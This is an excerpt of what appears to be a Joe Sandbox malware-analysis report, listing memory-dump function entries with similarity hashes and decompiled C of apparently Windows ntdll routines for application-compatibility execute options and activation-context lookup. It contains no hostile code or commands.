                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D71B93 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: cd17eef938589b48f7b8bbbddabb996c27cbea792ead0a4d3a96c43bb4a4f2ec
                                                                                                                                                                                            • Instruction ID: 99c846e2f8b4f171660b734a125994a47f6872c0d152cbff8d2b75947c417561
                                                                                                                                                                                            • Opcode Fuzzy Hash: cd17eef938589b48f7b8bbbddabb996c27cbea792ead0a4d3a96c43bb4a4f2ec
                                                                                                                                                                                            • Instruction Fuzzy Hash: 27D012B592E2C08EC30BAF2891555017FE0AF0A704B4685ADA005D7E15D5244445D614
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEBA80 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: dd47e3bb5213bc1a1c2b09b79148377d5e652704706d6c23ad6a9b59d0ef20da
                                                                                                                                                                                            • Instruction ID: 964e9d69c3850204978275a2df6f7396cd74dcd2716bb8c54f5902222679354c
                                                                                                                                                                                            • Opcode Fuzzy Hash: dd47e3bb5213bc1a1c2b09b79148377d5e652704706d6c23ad6a9b59d0ef20da
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AC04C32190648BBC7226A45DD11F157B69E794B60F154021B6040A9618576E961D998
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1B9FA Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                                                                                                                            • Instruction ID: a3c16f16e6c2492436c4d5205d977da59594fcecfdfbfc3de891f232ee44f136
                                                                                                                                                                                            • Opcode Fuzzy Hash: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 45C02BB01504809BDB454B30CC04F103254F700E21FA803547130468F0CAB89C00D920
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7DB90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                                                                                                            • Instruction ID: 6390b6dc8bc5d1136bbcf96812055b4d3784eddd76253750ce8e410d19c7ba4a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EA02232020E80CFCB83AF20CA00F003332FB00A00FCA08A0E0008AC30822EE800CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7DB1B Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                                                                                                            • Instruction ID: 6390b6dc8bc5d1136bbcf96812055b4d3784eddd76253750ce8e410d19c7ba4a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EA02232020E80CFCB83AF20CA00F003332FB00A00FCA08A0E0008AC30822EE800CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7DA31 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                                                                                                            • Instruction ID: 6390b6dc8bc5d1136bbcf96812055b4d3784eddd76253750ce8e410d19c7ba4a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EA02232020E80CFCB83AF20CA00F003332FB00A00FCA08A0E0008AC30822EE800CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D33C90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2b65195ba961f3df79ef4a82f45d3e48bc52f61a991ba12ad8b71113984e939c
                                                                                                                                                                                            • Instruction ID: 47c3792cf651f39da4158f344f15f1072c314c609f4e3ea448d1a2fc87c4ebf8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b65195ba961f3df79ef4a82f45d3e48bc52f61a991ba12ad8b71113984e939c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B90023524100802D9107558A904646004647D0342F51D816A0414528DCA6588A5B221
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D33C30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 0541124ba0f78b4682f8053f7967c1de7f2aeb7f5cad7f7626ba7e2e8f3fd529
                                                                                                                                                                                            • Instruction ID: cee9deedcc41de1395b3fa3adc845f5bc5a2b1d0859f090958df712afb083ea9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0541124ba0f78b4682f8053f7967c1de7f2aeb7f5cad7f7626ba7e2e8f3fd529
                                                                                                                                                                                            • Instruction Fuzzy Hash: F49002312420054299407658A904A4E410547E1343B91D81AA0005524CCD2588656321
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DCA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: HEAP:
                                                                                                                                                                                            • API String ID: 3446177414-2466845122
                                                                                                                                                                                            • Opcode ID: ae1026d9495432740acf61b469eecb12ba8f3f4b5bd77f80bbdf7e70048753bd
                                                                                                                                                                                            • Instruction ID: 4b4f4299c67333a5da33a14921abbfcb685312787cf6a0829959530e48133bb6
                                                                                                                                                                                            • Opcode Fuzzy Hash: ae1026d9495432740acf61b469eecb12ba8f3f4b5bd77f80bbdf7e70048753bd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 03A1C176A283518FD704CF28C894A1ABBE5FF88750F18456DE986DB311EB30ED46CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D27550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                            			E33D27550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x33deb370 ^ _t107;
				_v8 =  *0x33deb370 ^ _t107;
				_t105 = __ecx;
				if( *0x33de6664 == 0) {
					L5:
					return L33D34B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				L33CFE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E33D27738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E33D2763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = L33D32B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E33D276ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						L33D7EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						L33D38F40( &_v548, 0, 0x214);
						_t106 =  *0x33de6664;
						_t110 = _t108 + 0x20;
						 *0x33de91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x33de6664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							L33D34C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						L33D7EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = L33D3A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							L33D7EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E33D3A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								L33D7EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								L33D6CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						L33D7EF10();
						goto L15;
					}
					L8:
					_t56 = E33D27648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                                                                                                                                            0x33d27560
                                                                                                                                                                                            0x33d27562
                                                                                                                                                                                            0x33d2756f
                                                                                                                                                                                            0x33d27571
                                                                                                                                                                                            0x33d275ab
                                                                                                                                                                                            0x33d275b9
                                                                                                                                                                                            0x33d275b9
                                                                                                                                                                                            0x33d27579
                                                                                                                                                                                            0x33d27583
                                                                                                                                                                                            0x33d2758f
                                                                                                                                                                                            0x33d64443
                                                                                                                                                                                            0x33d27595
                                                                                                                                                                                            0x33d2759e
                                                                                                                                                                                            0x33d2759e
                                                                                                                                                                                            0x33d275a2
                                                                                                                                                                                            0x33d275bc
                                                                                                                                                                                            0x33d275c2
                                                                                                                                                                                            0x33d275c7
                                                                                                                                                                                            0x33d275c9
                                                                                                                                                                                            0x33d27621
                                                                                                                                                                                            0x33d27623
                                                                                                                                                                                            0x33d27624
                                                                                                                                                                                            0x33d275f8
                                                                                                                                                                                            0x33d275ff
                                                                                                                                                                                            0x33d27601
                                                                                                                                                                                            0x33d2762c
                                                                                                                                                                                            0x33d27603
                                                                                                                                                                                            0x33d27609
                                                                                                                                                                                            0x33d27610
                                                                                                                                                                                            0x33d27612
                                                                                                                                                                                            0x33d27612
                                                                                                                                                                                            0x33d27612
                                                                                                                                                                                            0x33d27614
                                                                                                                                                                                            0x33d27616
                                                                                                                                                                                            0x33d27630
                                                                                                                                                                                            0x33d27633
                                                                                                                                                                                            0x33d27633
                                                                                                                                                                                            0x33d27618
                                                                                                                                                                                            0x33d2761a
                                                                                                                                                                                            0x33d645c9
                                                                                                                                                                                            0x33d645c9
                                                                                                                                                                                            0x33d645d1
                                                                                                                                                                                            0x33d645d2
                                                                                                                                                                                            0x33d645d4
                                                                                                                                                                                            0x33d645d6
                                                                                                                                                                                            0x33d645d6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d2761a
                                                                                                                                                                                            0x33d275ce
                                                                                                                                                                                            0x33d275d4
                                                                                                                                                                                            0x33d275da
                                                                                                                                                                                            0x33d275df
                                                                                                                                                                                            0x33d275e1
                                                                                                                                                                                            0x33d6444a
                                                                                                                                                                                            0x33d64450
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d64456
                                                                                                                                                                                            0x33d64469
                                                                                                                                                                                            0x33d64476
                                                                                                                                                                                            0x33d64486
                                                                                                                                                                                            0x33d6448b
                                                                                                                                                                                            0x33d64497
                                                                                                                                                                                            0x33d644b9
                                                                                                                                                                                            0x33d644bf
                                                                                                                                                                                            0x33d644c1
                                                                                                                                                                                            0x33d644c3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d644c9
                                                                                                                                                                                            0x33d644cf
                                                                                                                                                                                            0x33d644d1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d644dc
                                                                                                                                                                                            0x33d644de
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d644e6
                                                                                                                                                                                            0x33d644ed
                                                                                                                                                                                            0x33d644ef
                                                                                                                                                                                            0x33d645c4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d645c4
                                                                                                                                                                                            0x33d644f7
                                                                                                                                                                                            0x33d644f8
                                                                                                                                                                                            0x33d64510
                                                                                                                                                                                            0x33d64515
                                                                                                                                                                                            0x33d64524
                                                                                                                                                                                            0x33d6452b
                                                                                                                                                                                            0x33d6452c
                                                                                                                                                                                            0x33d6452e
                                                                                                                                                                                            0x33d64556
                                                                                                                                                                                            0x33d64561
                                                                                                                                                                                            0x33d64567
                                                                                                                                                                                            0x33d64569
                                                                                                                                                                                            0x33d6456c
                                                                                                                                                                                            0x33d6456e
                                                                                                                                                                                            0x33d64574
                                                                                                                                                                                            0x33d64576
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d6457c
                                                                                                                                                                                            0x33d6457c
                                                                                                                                                                                            0x33d64584
                                                                                                                                                                                            0x33d64588
                                                                                                                                                                                            0x33d6458a
                                                                                                                                                                                            0x33d6458c
                                                                                                                                                                                            0x33d6458e
                                                                                                                                                                                            0x33d6458e
                                                                                                                                                                                            0x33d6459b
                                                                                                                                                                                            0x33d645a0
                                                                                                                                                                                            0x33d645a7
                                                                                                                                                                                            0x33d645ac
                                                                                                                                                                                            0x33d645ae
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d645b4
                                                                                                                                                                                            0x33d645b4
                                                                                                                                                                                            0x33d645b7
                                                                                                                                                                                            0x33d645b7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d645bf
                                                                                                                                                                                            0x33d64530
                                                                                                                                                                                            0x33d64535
                                                                                                                                                                                            0x33d64537
                                                                                                                                                                                            0x33d64539
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d6453e
                                                                                                                                                                                            0x33d275e7
                                                                                                                                                                                            0x33d275e9
                                                                                                                                                                                            0x33d275ee
                                                                                                                                                                                            0x33d275f0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d275f2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d275a4
                                                                                                                                                                                            0x33d275a4
                                                                                                                                                                                            0x33d275a4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d275a4

                                                                                                                                                                                            Strings
                                                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 33D64592
                                                                                                                                                                                            • Execute=1, xrefs: 33D6451E
                                                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 33D6454D
                                                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33D64460
                                                                                                                                                                                            • ExecuteOptions, xrefs: 33D644AB
                                                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 33D64507
                                                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33D64530
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                                                                            • Opcode ID: 2638aad05ae4e6220c4952a9e627cd0f81e414954f9806fbe66e7dee7f8bc2b6
                                                                                                                                                                                            • Instruction ID: 7860bb456d2951df9c2aeeeaafb0403f75eff97cd4fb2783bb78493ec49d592a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2638aad05ae4e6220c4952a9e627cd0f81e414954f9806fbe66e7dee7f8bc2b6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B513771A003096FEB609BA4DC95FADBBB8EF04748F4404E9F615E7582EB709E418F60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D0A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                                            			E33D0A170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
